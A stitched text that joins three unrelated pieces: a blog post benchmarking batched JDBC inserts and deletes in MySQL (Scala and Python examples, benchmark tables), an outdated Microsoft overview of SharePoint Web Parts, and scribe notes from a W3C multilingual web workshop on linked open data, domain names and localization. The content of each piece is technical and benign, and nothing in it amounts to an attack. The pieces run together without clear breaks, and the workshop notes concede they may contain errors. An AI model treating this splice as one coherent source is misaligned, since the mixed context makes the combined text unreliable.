Benchmarking batch JDBC queries

One of our services recently started to perform multiple inserts and deletes in a MySQL database, to the point of a noticeable response time increase. Batching of SQL queries is nothing new, but I decided to wander around this topic a bit on the Internet and stumbled upon something I had never heard of before (or blissfully forgot): the rewriteBatchedStatements property of the MySQL JDBC driver. So here I am, benchmarking this thing and checking other options.

Disclaimer 1. To be honest, this post doesn't contain anything new or special. I've just discovered something interesting and would like to share it.

Disclaimer 2. This time I haven't prepared a standalone code example, as I did this for a specific task inside our bazel monorepo using some of our internal tooling. Sorry. But there's nothing special in these benchmarks.

What happened?

Initially we used queries like this (all examples are for scalikejdbc, but it doesn't really matter):

```scala
case class Entity(id: String, val1: String, val2: Boolean, val3: Array[Byte])

def add(entity: Entity): Unit = autoCommit { implicit session =>
  sql"""
    INSERT INTO tbl (id, col1, col2, col3)
    VALUES (${entity.id}, ${entity.val1}, ${entity.val2}, ${entity.val3})
  """
    .update()
    .apply()
}

def remove(id: String): Unit = autoCommit { implicit session =>
  sql"""DELETE FROM tbl WHERE id = $id"""
    .update()
    .apply()
}
```

As the system evolved, we started calling those DAO methods in a loop (gotcha!). Eventually the number of entities grew, and we got a problem :)

Batching

Batching is an attempt to reduce the number of round-trips from the application to the database. Instead of sending a bunch of separate requests, the driver sends the queries like this:

```sql
INSERT INTO tbl (...) VALUES (...); INSERT INTO tbl (...) VALUES (...);
```

Note the ; between the queries. Those are still separate statements, but they are sent as a single request.
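The same batching idea can be sketched outside of JDBC. Below is a minimal Python stand-in using the built-in sqlite3 module (the table and column names mirror the article's examples; the wire-level details differ, but `executemany` plays the role of `addBatch()`/`executeBatch()`: prepare once, execute for every parameter tuple):

```python
import sqlite3

# In-memory database as a stand-in for MySQL (illustrative only).
conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE tbl (id TEXT PRIMARY KEY, col1 TEXT, col2 INTEGER, col3 BLOB)"
)

entities = [(f"id-{i}", f"val-{i}", i % 2, b"\x00\x01") for i in range(100)]

# executemany is the batched form: one prepared statement, many parameter rows.
conn.executemany(
    "INSERT INTO tbl (id, col1, col2, col3) VALUES (?, ?, ?, ?)", entities
)
conn.commit()

count = conn.execute("SELECT COUNT(*) FROM tbl").fetchone()[0]
print(count)  # 100
```

The per-row alternative would call `conn.execute(...)` once per entity, which is exactly the loop-over-DAO-methods pattern the article starts from.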
The code change is not that big:

```scala
def add(entities: Seq[Entity]): Unit = localTx { implicit session =>
  val params = entities.map { entity =>
    Seq(
      "id" -> entity.id,
      "val1" -> entity.val1,
      "val2" -> entity.val2,
      "val3" -> entity.val3,
    )
  }
  sql"""
    INSERT INTO tbl (id, col1, col2, col3)
    VALUES ({id}, {val1}, {val2}, {val3})
  """
    .batchByName(params: _*)
    .apply()
}
```

We can do a similar thing for DELETE:

```scala
def remove(ids: Seq[String]): Unit = localTx { implicit session =>
  val params = ids.map(v => Seq(v))
  sql"""DELETE FROM tbl WHERE id = ?"""
    .batch(params: _*)
    .apply()
}
```

Better DELETE (IN clause)

Actually, for DELETE we can do something much more robust:

```scala
def remove(ids: Seq[String]): Unit = autoCommit { implicit session =>
  val inClause = SQLSyntax.csv(ids.map(id => sqls"""$id"""): _*)
  sql"""DELETE FROM tbl WHERE id IN ($inClause)"""
    .update()
    .apply()
}
```

rewriteBatchedStatements

I stumbled upon this parameter on StackOverflow and instantly decided to check how it works. Basically, it rewrites batched INSERT queries into multi-value queries:

```sql
INSERT INTO tbl (...) VALUES (...), (...), (...)
```

This makes the query slightly more concise (less SQL), and something inside MySQL makes it faster.

Benchmarks

First, I verified that rewriteBatchedStatements actually works by enabling profiler logs in the driver; they showed the final queries. Second, I built a very simple benchmark that tests different flavors of batching for INSERT and DELETE with different numbers of entries. Each entry in my test is a few hundred bytes across multiple columns, nothing fancy.

INSERT

As you can see in the benchmark results below, the multi-value INSERT is indeed the fastest. oneByOne is just a loop outside the DAO; its total time increases linearly (obviously). The problem here is simple: the number of transactions in MySQL equals the number of rows we are inserting, and a transaction takes time. The solution is to start a transaction only once and then run the queries in a loop within that transaction.
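The rewriting that the driver performs can be illustrated with a few lines of Python. This is only a simulation of the idea — the real rewriting happens inside MySQL Connector/J when the connection URL contains rewriteBatchedStatements=true — but it shows the transformation:

```python
def rewrite_batched_insert(template: str, num_rows: int) -> str:
    """Fold N single-row INSERT statements into one multi-value statement,
    the way rewriteBatchedStatements=true does inside the driver
    (illustrative sketch, not the driver's actual implementation)."""
    head, values = template.rsplit("VALUES", 1)
    return head + "VALUES " + ", ".join([values.strip()] * num_rows)

sql = rewrite_batched_insert("INSERT INTO tbl (id, col1) VALUES (?, ?)", 3)
print(sql)  # INSERT INTO tbl (id, col1) VALUES (?, ?), (?, ?), (?, ?)
```

One request, one statement, N value tuples — which is why it beats plain batching in the benchmarks below.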
This case is represented by oneByOneInTransaction in the table. As you can see, its performance is comparable to regular batching.

Benchmark              (numberOfEntities)  Mode  Cnt     Score  Error  Units
batch                                   1  avgt    2    12.797         ms/op
batchRewriting                          1  avgt    2    11.769         ms/op
oneByOneInTransaction                   1  avgt    2    12.624         ms/op
oneByOne                                1  avgt    2    12.184         ms/op
batch                                  10  avgt    2    13.433         ms/op
batchRewriting                         10  avgt    2    11.835         ms/op
oneByOneInTransaction                  10  avgt    2    15.592         ms/op
oneByOne                               10  avgt    2   125.161         ms/op
batch                                 100  avgt    2    29.763         ms/op
batchRewriting                        100  avgt    2    22.480         ms/op
oneByOneInTransaction                 100  avgt    2    35.664         ms/op
oneByOne                              100  avgt    2  1281.417         ms/op
batch                                1000  avgt    2   213.938         ms/op
batchRewriting                       1000  avgt    2   148.009         ms/op
oneByOneInTransaction                1000  avgt    2   229.646         ms/op
batch                               10000  avgt    2  2027.138         ms/op
batchRewriting                      10000  avgt    2  1497.429         ms/op
oneByOneInTransaction               10000  avgt    2  2321.587         ms/op

DELETE

In the case of DELETE, the rewriteBatchedStatements option shouldn't affect anything. However, it still performs better than regular batching. As expected, the IN clause gives the best performance, as it is a single query (just like the multi-value INSERT).
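The oneByOneInTransaction variant — one transaction wrapped around the whole loop instead of one transaction per statement — can be sketched with sqlite3 (a stand-in for MySQL; the variant name follows the benchmark):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE tbl (id TEXT PRIMARY KEY)")

ids = [f"id-{i}" for i in range(1000)]

# One BEGIN/COMMIT around the whole loop: `with conn` opens a transaction
# and commits once on success, instead of paying transaction overhead per row.
with conn:
    for id_ in ids:
        conn.execute("INSERT INTO tbl (id) VALUES (?)", (id_,))

total = conn.execute("SELECT COUNT(*) FROM tbl").fetchone()[0]
print(total)  # 1000
```

In JDBC terms this corresponds to `setAutoCommit(false)`, executing the statements in a loop, then calling `commit()` once.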
Benchmark              (numberOfEntities)  Mode  Cnt     Score  Error  Units
batch                                   1  avgt    2    21.636         ms/op
batchRewriting                          1  avgt    2    15.237         ms/op
inClause                                1  avgt    2    13.483         ms/op
oneByOneInTransaction                   1  avgt    2    10.938         ms/op
oneByOne                                1  avgt    2    12.273         ms/op
batch                                  10  avgt    2    16.328         ms/op
batchRewriting                         10  avgt    2    14.396         ms/op
inClause                               10  avgt    2    11.184         ms/op
oneByOneInTransaction                  10  avgt    2    13.085         ms/op
oneByOne                               10  avgt    2   124.575         ms/op
batch                                 100  avgt    2    21.893         ms/op
batchRewriting                        100  avgt    2    17.696         ms/op
inClause                              100  avgt    2    13.029         ms/op
oneByOneInTransaction                 100  avgt    2    24.492         ms/op
oneByOne                              100  avgt    2  1181.656         ms/op
batch                                1000  avgt    2   104.244         ms/op
batchRewriting                       1000  avgt    2    83.070         ms/op
inClause                             1000  avgt    2    25.444         ms/op
oneByOneInTransaction                1000  avgt    2   130.383         ms/op
batch                               10000  avgt    2   925.338         ms/op
batchRewriting                      10000  avgt    2   854.990         ms/op
inClause                            10000  avgt    2   167.237         ms/op
oneByOneInTransaction               10000  avgt    2  1254.676         ms/op

Conclusion

The way to achieve the best performance with a database is to use the smallest number of queries. For INSERT that is a multi-value query; for DELETE it is an IN clause with multiple identifiers. For DELETE queries it's on us to write them properly, and for INSERT queries there is a very nice driver option that converts your batched query into a multi-value query and boosts performance auto-magically!
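The winning single-query DELETE can be sketched in Python with sqlite3, generating one placeholder per id — the same idea as SQLSyntax.csv in the scalikejdbc example (an illustrative stand-in, not the article's MySQL setup):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE tbl (id TEXT PRIMARY KEY)")
conn.executemany(
    "INSERT INTO tbl (id) VALUES (?)", [(f"id-{i}",) for i in range(10)]
)

# Build "?, ?, ?" so all ids are removed by a single parameterized query,
# keeping the values out of the SQL string (no injection risk).
ids_to_remove = ["id-1", "id-3", "id-5"]
placeholders = ", ".join("?" for _ in ids_to_remove)
conn.execute(f"DELETE FROM tbl WHERE id IN ({placeholders})", ids_to_remove)
conn.commit()

remaining = conn.execute("SELECT COUNT(*) FROM tbl").fetchone()[0]
print(remaining)  # 7
```

Note that very large id lists may exceed a database's parameter or packet limits, so in practice the list is usually chunked.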
https://dkomanov.medium.com/benchmarking-batch-jdbc-queries-a2b5911ada26
Web Parts Overview

This content is outdated and is no longer being maintained. It is provided as a courtesy for individuals who are still using these technologies. This page may contain URLs that were valid when originally published, but now link to sites or pages that no longer exist.

Web Parts are server-side controls that run inside the context of special pages (that is, Web Part Pages) within an ASP.NET application or a Windows SharePoint Services site. They are the "building blocks" of pages in Windows SharePoint Services. Windows SharePoint Services includes built-in Web Parts that you can use as soon as you have installed the product. In addition, you can build your own Web Parts and deploy them to the server.

Because of the popularity of Web Parts in Windows SharePoint Services 2.0, support for a new Web Part infrastructure for ASP.NET 2.0 was added to Windows SharePoint Services 3.0. The new Web Part infrastructure is similar to, yet distinct from, the Web Part infrastructure in Windows SharePoint Services 2.0. There are now two different Web Part styles in Windows SharePoint Services 3.0. Both are supported, but the ASP.NET 2.0 Web Part is the recommended style for new projects.

SharePoint-based Web Parts — The older-style Web Parts have a dependency on Microsoft.SharePoint.dll and must inherit from the WebPart base class in the Microsoft.SharePoint.WebPartPages namespace. These Web Parts can be used only in SharePoint Web sites. In Windows SharePoint Services 3.0, however, Microsoft.SharePoint.dll was changed so that Web Parts written in the older style are compatible with the Windows SharePoint Services 3.0 runtime.

ASP.NET 2.0 Web Parts — These Web Parts are built on top of the ASP.NET Web Part infrastructure. The newer ASP.NET-style Web Parts have a dependency on System.Web.dll and must inherit from a different base class named WebPart in the System.Web.UI.WebControls.WebParts namespace.
These Web Parts can be used in ASP.NET 2.0 applications whether Windows SharePoint Services is involved or not, making them highly reusable.

The Windows SharePoint Services 3.0 Web Part infrastructure is built on top of a control named SPWebPartManager that is derived from the ASP.NET 2.0 WebPartManager control. The SPWebPartManager control overrides the standard behavior of the WebPartManager control to persist Web Part data inside the Windows SharePoint Services content database instead of in the ASP.NET services database. In most cases, you do not have to worry about dealing directly with the SPWebPartManager control because the one and only required instance is already defined in default.master. When you create a content page that links to default.master, the SPWebPartManager control is already there.

When you create a Web Part Page for a standard ASP.NET 2.0 application, you need to add logic that interacts with the WebPartManager control to manage the Web Part display mode, and generally you also need to explicitly add editor parts and catalog parts to the page along with the HTML layout to accommodate them. Fortunately, you do not have to make these changes when creating content pages for a Windows SharePoint Services 3.0 site. Instead, you inherit from the WebPartPage class that is defined inside the Microsoft.SharePoint.WebPartPages namespace, and it does all the work behind the scenes for you. For more information about creating ASP.NET Web Parts, see ASP.NET AJAX in Windows SharePoint Services and Web Parts Control Set Overview in the ASP.NET documentation.

Custom Web Parts provide developers with a method to create user interface elements that support both customization and personalization. A site owner or a site member with the appropriate permissions can customize Web Part Pages by using a browser or Microsoft Office SharePoint Designer 2007 to add, reconfigure, or remove Web Parts.
In Windows SharePoint Services 2.0, developers could extend SharePoint sites by creating custom Web Parts, adding the extra dimensions of user customization and personalization. The following are some of the ways you can benefit from and use custom Web Parts:

Creating custom properties that you can display and modify in the user interface.

Improving performance and scalability. A compiled custom Web Part runs faster than a script.

Implementing proprietary code without disclosing the source code.

Securing and controlling access to content within the Web Part. Built-in Web Parts allow any user with appropriate permissions to change content and alter Web Part functionality. With a custom Web Part, you can determine the content or properties to display to users, regardless of their permissions.

Making your Web Part connectable, allowing Web Parts to provide or access data from other connectable Web Parts.

Interacting with the object models that are exposed in Windows SharePoint Services. For example, you can create a custom Web Part to save documents to a Windows SharePoint Services document library.

Controlling the cache for the Web Part by using built-in cache tools. For example, you can use these tools to specify when to read, write, or invalidate the Web Part cache.

Benefiting from a rich development environment with debugging features that are provided by tools such as Microsoft Visual Studio 2005.

Creating a base class for other Web Parts to extend. For example, to create a collection of Web Parts with similar features and functionality, create a custom base class from which multiple Web Parts can inherit. This reduces the overall cost of developing and testing subsequent Web Parts.

Controlling the implementation of the Web Part. For example, you can write a custom server-side Web Part that connects to a back-end database, or you can create a Web Part that is compatible with a broader range of Web browsers.
https://msdn.microsoft.com/en-us/library/office/ms432401(v=office.12)
Note: The following notes were made during the Workshop or produced from recordings after the Workshop was over. They may contain errors, and interested parties should study the video recordings to confirm details.

Scribe: Dominic Jones

Jose: best practices for ML LOD given at last workshop. One pattern is a solution to a problem. Good to have a catalog of patterns for selection. Common vocabs.
... best solutions for Multilingual Linked Open Data
... each pattern has a description, example, discussion.
... patterns have a name, dereference, long description, linkings and reuse factors.

Jose: 20 patterns, for the community to add to and adapt
... person is an Armenian and professor at the University of Leon. Person has birthplace, position and works-at
... 1st, select a URI scheme. A descriptive URI is human-readable ASCII characters
... another pattern is opaque URIs, where local names are not human-readable. These are independent from any natural language implementation
... these are hard for developers to handle
... so: descriptive URIs, opaque URIs and full IRIs
... internationalized local names: the domain name is ASCII chars but the local name is in local chars

Dave Lewis: See Jose: another pattern is to include a language tag in the URI
... dereference: return labels based on the language code of the user
... semantic equivalence of data needs to be identified.
... labeling: label everything, including using multilingual labels. ML labels have a problem when querying looks for mono-lingual labels.
... solution = labels with no lang tag
... but with this, which language is the default? Longer descriptions are difficult to handle; better to have finer-grained descriptions to separate out labels.
... for longer descriptions there is the possibility of structured literals.
... linking: the same concepts in different languages are identified as being the same. However, contradictions exist. Linked linguistic meta-data exists, 1st-class lang annotations.
... reuse: vocabs are generally mono-lingual.
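The "return labels based on the language code of the user" dereferencing pattern described above can be sketched in plain Python. The data is hypothetical (a real implementation would select among RDF literals with language tags), but the fallback logic is the point:

```python
def pick_label(labels: dict, accept: list, default: str = "en") -> str:
    """Pick a label matching the user's language preferences, falling back
    to a default language and then to any available label.
    `labels` maps language tags to label strings (hypothetical data)."""
    for lang in accept:
        if lang in labels:
            return labels[lang]
    return labels.get(default, next(iter(labels.values())))

labels = {"en": "University", "es": "Universidad", "hy": "Համալսարան"}
print(pick_label(labels, ["hy", "en"]))  # Համալսարան
print(pick_label(labels, ["fr"]))        # University (falls back to "en")
```

This mirrors HTTP content negotiation on Accept-Language: the URI stays language-neutral while the representation served varies per user.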
Multilingual vocabs are more difficult to maintain
... can create new localized vocabs
... future work: a session on best practices for ML LOD, an opportunity to improve the catalog / add to / remove from the catalog

Asuncion: all ML concepts should be addressed in LD generation
... the model is simple, everything is in RDFS
... subject, property, value. Unique identifiers, URIs, are used. Subjects are represented by URIs.
... using equivalence links to link data sets
... lots of info sources in different languages. RDF generation and linked data allow for graphical representation of ML LOD sets
... currently looking at a million-literals data set
... the number of literals with language tags has increased from 2011 to 2012
... still mostly in English. Data in other languages are similar. Most data is in English, as not many countries are providing LD in languages other than English
... in the LD cloud, ML querying is achieved through 6 stages.
... 1) Specification: how to model data sets. 2) Translate labels of the ontology into other languages, align vocabs of other languages. Reuse / align existing vocabs. 3) RDF generation: use richer models for applications
... 4) Link generation: how to discover cross-lingual links, how to represent cross-lingual links, how to store and reuse links.
... concepts are tagged in a language-based ontology; these ontologies are linked, cross-lingual links. Properties describe medicine
... ontology in German and Spanish: translate German into Spanish and check for alignments, or use cross-lingual ontology matching across both
... 5) Publication: links can be discovered at run time or offline; some storage method is needed for links already discovered.
... 6) Exploitation: how to adapt a semantic query to the linguistic and cultural background of a user. Also how the results of a semantic query should be adapted.
... For ML LOD many services need to exist, from generation through to consumption. ML LOD should be provided through service translation, but now we should start including language features in the generation of data

Peter: large repository for public linked open data
... the Publications Office of the EU is a publisher of EU institutions' legislative and non-legislative documents. Whole process of document management. Finally moving from a paper to an electronic model, and from publisher to data provider
... the shift from paper to electronic makes the electronic version of the EU journal legally binding.
... Multilingualism is core, 23 languages used. Every EU member state requires publication in its own language. For example, 2600 pages per document * 23 langs
... ML supports all member states equally, therefore ML public websites must exist: for law, procurement, CORDIS and the general publication bookshop.
... four systems for the ML semantic web
... CELLAR, EU Data Portal, Eurovoc, MDR
... 1) CELLAR is currently in production, not yet public, being loaded / populated. Some key concepts: the repository is defined by a common data model (ontology). The semantic model is built up from these components. Loading is standardized, 30TB of data
... in the repository, content is stored at the top level and meta-data is linked to it. Distribution side and SPARQL endpoint.
... 700M triples in the store. Mainly PDF, XML and XHTML.
... accessible through a RESTful API or through a SPARQL endpoint
... 2) EU Data Portal: a single point of access to all structured data for linking and reuse of commercial and non-commercial data

Peter: RDF-based interface for upload of meta-data
... 3) EUROVOC, available in SKOS/RDF or XML format.
4) Meta-data Registry (MDR): concepts which have been validated are published through CELLAR; controlled vocabs, etc. 5) For English, all the languages of the EU are presented; translations are discussed between all units in the EU and therefore official translations (by member states) exist

scribe: European Legislation Identifier (ELI) follows W3C RDF / XML to provide data in a standardized way.

Gordon: IFLA is the body which maintains global standards for the library and biblio environment.
... separate to IFLA are ISBD and UNIMARC; all three relate to library / biblio standards,
... all three are used internationally.
... IFLA has its own namespace for standards. Supports conversion from library linked data without loss of information.
... IFLA has 7 languages. Standards are generally written in English and then translated into the 7 languages.
... ML website launched in Spanish, partial doc in Spanish of what exists in Spanish already.
... the Open Metadata Registry is used to store classes, URIs for each maintainer. These are opaque so as to avoid language bias when used in RDF
... ISBD elements: problems occurred when the namespace was translated. The translation into Spanish became guidelines for doing future translations. Contains much info on the problems / issues of translations.
... Problems: 1) Scope: what is translated first and what is most useful. (Developers: element definitions, labels.) (Users: what they see, labels of concepts in value vocabs.)
... 2) Style: verbal phrasing, CamelCasing etc.
... hasAuthor, hasTitle do not translate perfectly into other languages. CamelCasing looks bad in other languages; what's OK in one language may not work in another. 3) Disambiguation: methods for creating labels may vary between languages. 4) Language inflection. Partial translations: only the preferred label is translated; have to track the status of a translation through a number of stages, so schedules and status tracking are required.
MulDiCat for authoritative translations of IFLA standards, available in the open meta-data repository as well. More than 26 langs represented.

Thierry: on the web: ML pages, dictionaries, tools. Not every document is available in every language. When I access the web in German or French I don't often get docs in other languages. Mono-lingual search
... semantic resources are already available on the web. We have the ML web, pages, resources, but we want the Sem Web to run in combination with lang tech so we can annotate text
... GICS: class IDs, labels; these labels use non-standard formats etc.
... towards a ML linguistic Semantic Web, so labels can be encoded in RDF using the Lemon model. Also want to mention Linguistic Linked Open Data.
... annotate text available in multiple languages: 1) take all labels, analyze, combine in a semantic repository using Lemon and apply to running annotated text. Can also be stored in a queryable tool.
... in one ontology you display suggestions for ML labels encoded in the ontology
... NooJ can be used to test NLP analysis of labels; the difference is the way natural language can be expressed
... need to harmonise and modify a label for NLP. Terminological expansion of labels provides taxonomies for preferred labels. From 1 label, 5 labels can be generated, annotated using Lemon and exported
... triggering of ellipsis resolution to cross-lingual labels in other languages. Labels are expanded based on a property of another language.
... from this we discovered semantic annotation of web documents in many languages.
... text from the Spanish stock market: two similar taxonomies generate two annotations; both labels point to the same concept but are textually different.
... labels can be displayed in many other languages and allow for annotations in higher-level languages.
... need to make sure these are compliant in terms of standardisation.

lmatteis: What's the reason behind having 'opaque' URIs, and translating RDF predicates?
They are merely identifiers, and as long as 'label' and 'definitions' have been properly translated, I see no reason to further complicate RDF vocabularies with multiple translations.

Gordon: Several reasons for opaque URIs. 1) A non-opaque URI must be based on something, therefore if the label changes the URI can't change, so it's more confusing. 2) The favoring of any language over another is not good practice. 3) When translating property and class labels we're using opaque URIs

Ivan: The Linked Data community doesn't know "anything" you guys are doing. Until the larger LD community is aware of your work I don't see anything changing. For devs to take ML LD into account they need to be aware of your work

Asuncion: An Ontology-Lexical WG is being proposed to be used for representation. The big countries investing in LD are English-speaking and are not immediately interested in ML LD.

Asuncion: From a SW perspective we need a road-map to push these ML issues. A White Paper for the community addressing these issues.

Ivan: W3C working groups are not suited for this. For example, schema.org represents vocabs that are used; we can't ignore them. Need to try to get the authors of schema.org to think about ML data
... labeling and documentation in ML form would be a huge step

Jose: I agree with your point, hence the catalog of patterns has been produced.
... need to educate, hence BP practices for ML LOD

Asuncion: Trying to analyze how languages are used and how these linguistic choices are applied to data sets

chaals: annotating other people's vocabs is socially difficult. Do opaque URIs avoid having a language bias? No, the bias exists in the model; opaque URIs hide this from the top-level view. We should be publishing annotations on other people's vocabs that are broken

jose: in the case of annotating and translating, the label that you want.
... labelsforall.info, similar to prefix.cc, for label and translation recording.

Q: Different communities. I second Ivan's views.
In terms of the ML-LOD cloud, when someone asks where is the ML-ism? A URI is a resource that can be in many languages. Dimensions: Peter S talks of TB of LOD. Many people talk in terms of one record. In ML-LOD 1) concept

Richard Ishida: The aim of the workshop is not just talks but to get people together, networking, to move things forward.

Christian Lieske: 2 things. 1) How far does the work you are driving / continuing affect content authors, user cataloging, etc.? Also, how far is the reviewing activity considered a general reviewer's toolkit?

Peter: no direct connections to author services; everything is translated, we're just proof-reading. In being efficient we work with coded data and cataloging.

Thierry: our work has implications for labels and taxonomies; in terms of impact, it is important we provide recommendations to change terminology to make it more applicable.

q: relation between the work of the speakers and repositories like Freebase?

Feiyu: an instance of Freebase can be used as a kind of interlingua; can be really useful for ML-LOD

Scribe: Phil Ritchie

Pat Kane: focus on end users
... users want to use their own scripts
... growth in Asia Pacific driving non-English domain names and URLs
... 1m+ international domain names registered in the first six months
... 50% CJK ideographs
... Armenian scripts under-served
... major browsers handle IDNs quite well
... email addresses used a lot as identifiers in log-ins
... What's hindering domain registrations? Greater user awareness, registrars
... better mobile browser support, management tools
... results in a lack of trust (intent for a user to register)
... users want full IDN support
... lack of ubiquity an issue
... IDNs are second-class domains; users are suspicious of them
... not comfortable with idn.ascii
... SMEs in China are more open to idn.idn
... 5 key insights: more utility needed, initial resistance to adoption, translation preferences,
... moderate interest in registration, and registrar channel expectations.
... Chinese want idn.idn, not idn.ascii
... in India respondents do not visit idn.idn
... in Japan comfortable with ascii.ascii
... Korea more passionate about idn.idn
... need multi-disciplinary groups to push adoption
... key roles: registries, registrars, content creators, application developers, governments and businesses
... and standards organisations
... circle of dependency: adoption -- ubiquity
... change the ecosystem to enhance user experience
... ubiquity drives trust
... ubiquity means not just desktop but also mobile
... mobile applications are much less capable of handling IDNs

Richard Ishida: concerned about data and data formats, specifically people's names
... web sites usually ask for "first" and "last" name
... use "given" and "family" name
... names are more complicated than we generally think
... applications want to parse names and do things with them, e.g. in salutations, search and sorting
... Björk's "surname" is actually her father's name
... "bin" == son of
... Mao Ze Dong: Ze == generational name
... how you would address him depends on a lot of things
... typically he would use a western name to make things easier for western people
... multiple family names: given name plus two family names
... father's name first, mother's name second; varies by country
... variant word forms indicating gender
... how names are inherited varies
... nicknames used often to help
... written forms can be ambiguous
... many Asian names can be transcribed identically
... Recommendation: ask people how they would like to be addressed
... this topic needs a lot more work
... need authoritative guidance on the problems of handling names

Sebastian: LOD == Linked Open Data cloud
... data sets published on the net
... free, open and openly licensed

Sebastian going through the LOD2 stack
... now about the NIF format
... linguistic LOD cloud
... in NIF, use fragment identifiers to address primary data
... can query NIF components as a web service
... OLiA: Vocabulary Module - mapping of over 50 tagsets
... NIF 2.0 plans: links to ITS 2.0, the Lemon ontology, an XPath URI scheme
... NIF will be free and open
... looking for contributors

Fernando: FAO has a presence in 82 country offices
... uses 6 official languages
... FAO users' language is primarily English, followed by Spanish and French
... currently reorganizing content to focus on decentralization and partnerships
... need to accommodate locally generated content
... issues faced: a lot of unstructured content, web content, language versions do not match, no localized URIs, low reuse of content
... lack of mono- and multilingual ontologies to drive navigation
... do have a stable geopolitical ontology
... need to make the best use of existing content, identify normative content, use CMS-independent content, use MT (for Arabic and Chinese), better understand (intended) users
... want to utilize standards and best practices: XLIFF, RDF, ITS 2.0; learn from translation workflows; get social: on-demand translation
... allow users to vote for pages that should be translated
... have a set of short-term and longer-term goals
... want to prioritize for Chinese, Russian, etc.

Paula: McKinsey: "Strong multinationals seem less healthy..."
... local firms in emerging markets succeed where multinationals fail
... marketing defined as a key function
... global means complexity, which means cost
... balance central vs local
... The Consumer Decision Journey
... written about in the Harvard Business Review
... many people in the digital age already know what they want to buy before they go to purchase it.
... consumers in the digital age trust social marketing
... push branding is irrelevant in the digital age
... so how do you form your pre-purchase opinion? Search
... changing the rules: The Global Customer Lifecycle
... 71% decide based on in-language search and peer recommendations
... 3 biggest problems: traffic, conversions, management
... when search is bad: "Can't find... won't buy"
... Web Localization Maturity Model
... SEO localization generates 15-40% more traffic
... increase search rankings and traffic
... be in the top 3 search results by benchmarking against competitors
... SEO-optimized translation is an iterative process
... look at baseline, keyword research, translation, QA, repeat
... percolate keywords throughout content
... analytics and reporting against competitors
... it's not just Google: 6/10 popular social networks are in China.
... Yandex expanding out of Russia
... pace of change is accelerating
... global companies need to be hyper-local.
... utilize local search-term experts
... long tail of search terms
... methods for executing multi-lingual Pay Per Click: MT, local offices, human translation, localization and optimisation
... hosting 1.5 million pages for clients

Reinhard Schaler: existing notion of "give up the illusion of control".
... What is stopping the localization industry from handing over to the users?

Paula Shannon: Localization is the step-child. No clear ROI. Localization has been a cost center, thus focused on efficiency and cost reduction

Des Oates: Some companies are making steps towards user empowerment
... Adobe has ceded control of certain products to users

Paula Shannon: text enrichment can help

Fernando Serván: monitor demand, traffic analytics
... demand to drive translation

Charles: when you prioritize translation on demand, how do you decide?
... how do you balance those things?
... your goal is to serve existing users

Fernando: it is tricky, I agree, but we are trying to understand users better
... time will tell

Richard Ishida: In India most people are used to ascii.ascii, yet a small percentage of users speak English
... should the market for IDNs be bigger?
Pat Kane: the biggest challenge is the number of languages and scripts

???: Globalization vs Localization vs Multiculturalism
... we ignore the multicultural component
... Fernando mentioned using MT for Arabic and Chinese
... these are difficult MT languages; do you have specific reasons for using MT for these languages?

Fernando: we know Spanish and French are easier
... it is difficult to find the volume of translators for Chinese and Arabic
... SDL: it's important to consider user feedback

Scribe: Dave Lewis

Des Oates: International domain names, chaired by Pat Kane
... best practice in multilingual linked open data, chaired by Dom Jones
... translation quality, chaired by Arle Lommel
... from the floor
... interest in translation quality: on post-editing as well as human translation

Des: the ball is now over to the audience to propose other topics
... the aim is not just to discuss but to propose action plans to deliver upon later
... some personal findings from the workshop to date
... input from content creators; advances using ITS 2.0 from Cocomore, also with Joomla and use with XLIFF in Drupal and DITA
... also real-world use cases with the Spanish tax office
... the other big topic is multilingual search and ML SEO, including insights from Paula
... a big issue for Adobe related to keyword and term management

Working doc at:

Ivan: The community needs more deployment, use cases, data and linked data
... underlying tech needs to be seen as stable, so people are not waiting for the next big thing; W3C is not planning to add anything more to the stack
... W3C won't standardise things, but will rely on community groups, e.g. the Open Annotation CG
... W3C wants to extend this and perhaps host vocabs with stable URIs, with a registry of meta-data. Not a value measure, just cataloguing meta-data and governance and version control of vocabs; will include localisation quality
... Need better validation; RDF is not well suited to this, so need structural validation (schema-like) and quality validation – but how to validate a multilingual vocab is a question for this work ... Disconnect between LOD and non-LOD, e.g. CSV, text files etc. Web-site developers use data, not linked data ... Reference: London Open Data on the Web workshop

Gordon: IFLA – similar to earlier presentation in plenary session ... Have a few trillion triples potentially, a large high-quality collection ... Some translated, some not, and partial translations ... Have a multilingual dictionary for authoritative publication of pub categories, but not very accessible to end users or web developers

Jose: Practical multilingual LOD guidelines ... Naming guidelines: extrapolated from monolingual guidelines ... Opaque URIs raise some controversy

Chaas: Tools need to be good ... Opaque URIs not helpful ... Yandex is in schema.org, but only looked at microdata rather than RDFa because it was easier, and now might be regretting this as RDFa might be better. Because of this, in Russia microdata is more common than RDFa ... At Yandex, people tend to add labels/metadata in English, but it was a better process to do it in Russian – on the whole you perform better in your own language

Roberto: BabelNet – wide multilingual semantic network, with encyclopedic and lexicographic content from Wikipedia and WordNet ... 6 languages covered, moving to 40+ ... 3 million synsets ... Planning to integrate BabelNet into the linguistic linked open data cloud ... Contribution to LOD: make it available in lemon, a real large multilingual LOD example

Haofen: APEX labs, China – data and knowledge management lab ... Chinese LOD (CLOD) – 8 million instances, 1 billion triples, from Chinese Wikipedia, baike.com and the Baidu encyclopedia site ... Issues: need to use IRIs, but limited by use of older browsers ... Naming resources: Wikipedia uses traditional Chinese rather than simplified Chinese ...
... Integrating with e-commerce sites 360buy, taobao and social networks Weibo and Dianping to motivate more open LOD data streams ... Align with schema.org

Jose: ... Notes taken on Google Docs ... Naming: descriptive vs opaque depends on the use case, useful for both ... Labeling: should always have a language tag ... Interlinks: sameAs and seeAlso may not be useful in all cases; lexical/linguistic resource interlinking is not always the same as conceptual interlinking ... Will start a community group on best practice in multilingual LOD ... Richard Ishida notes this is easy to set up and join

Arle: Need to decouple production method from end use ... Source quality is an issue, not always the translator's fault ... Quality is dependent on the step in the workflow where it is used ... Expectations need to be clear ... Are existing metrics actually valid and reproducible? Some are academic and not useful for production ... Need some process metrics to track these. Ethnographic studies of post-editors. ... Additional factors, see slides ... So what does Multilingual Web do to help? Three points: ... (1) Context, audience and use – common methods for HT, MT and PE MT – but need to be broadened out beyond QTLaunchpad (see workshop tomorrow) ... (2) Don't reinvent the wheel, harmonise parallel work ... (3) An ongoing effort is needed, perhaps centered on the MLW community at W3C

Pat: It is an ecosystem problem, not just for W3C; other bodies, other voices are needed also ... Perhaps a W3C working group could be a starting point

